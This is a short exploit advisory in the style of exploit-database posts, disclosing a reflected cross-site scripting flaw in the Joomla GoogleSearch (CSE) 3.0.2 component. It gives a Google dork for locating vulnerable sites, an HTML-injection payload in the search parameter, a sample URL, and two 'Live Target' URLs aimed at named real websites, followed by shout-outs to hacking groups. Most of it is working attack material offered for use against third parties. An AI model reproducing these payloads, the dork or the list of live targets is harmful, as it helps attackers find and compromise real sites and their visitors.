########################################################################################
#Exploit title: Joomla Component GoogleSearch (CSE) 3.0.2 - XSS Vulnerability
#Author: Bet0
#Twitter: https://twitter.com/Bet0_Shinoda
#Website: www.mc-crew.or.id
#Google Dork: inurl:"index.php?option=com_googlesearch_cse"
#Date: 29 Agustus 2015    
#Vendor Homepage: www.kksou.com
#Plugins Link: http://extensions.joomla.org/extensions/7023/details
#Tested on: Mozila Firefox 40.0 and Ubuntu 15.04 
########################################################################################

[+]Piye om Carane (PoC)

1. Go to Columns Search Input The malicious code "><img src=x onerror=prompt(1)>

[+]Sample
http://127.0.0.1/index.php?option=com_googlesearch_cse&n=30&Itemid=97&cx=005488517870211354079%3Ao9aiibgwgqs&cof=FORID%3A11&ie=ISO-8859-1&q="><img src=x onerror=prompt(1)>&sa=Search&hl=en&safe=active&siteurl=https%3A%2F%2Fwww.google.com


[+]Live Target
http://ufoforce.com/index.php?option=com_googlesearch_cse&n=30&Itemid=97&cx=005488517870211354079%3Ao9aiibgwgqs&cof=FORID%3A11&ie=ISO-8859-1&q=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28document.domain%29%3E&sa=Search&hl=en&safe=active&siteurl=https%3A%2F%2Fwww.google.com

http://www.linuxcnc.org/index.php?option=com_googlesearch_cse&n=30&Itemid=&cx=017093687396734519753%3Ao_92rwvgxxw&cof=FORID%3A9&ie=ISO-8859-1&q=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%281%29%3E&sa=Search&hl=en&siteurl=http%3A%2F%2Fwww.linuxcnc.org%2F

[+]Matur Suwun:
#Dek Cia :* kapan kita balikan maneh dek :'( kangen aku karo awakmu
#Ch0c01d, valcr00t, xr0b0tx, Don Tukulesto, rm -rf, vyc0d, Mr.Doel, Zen Rooney, nemesis, ArrchID   *Gae Kabeh Ojo lali Ndang Rabi, moso kalah ambe mas blie :)) *
#All member NyongDIE, Malang Cyber Crew, Indonesian Coder, Sund4nyM0uz Corporation, Explore Crew, HN-Community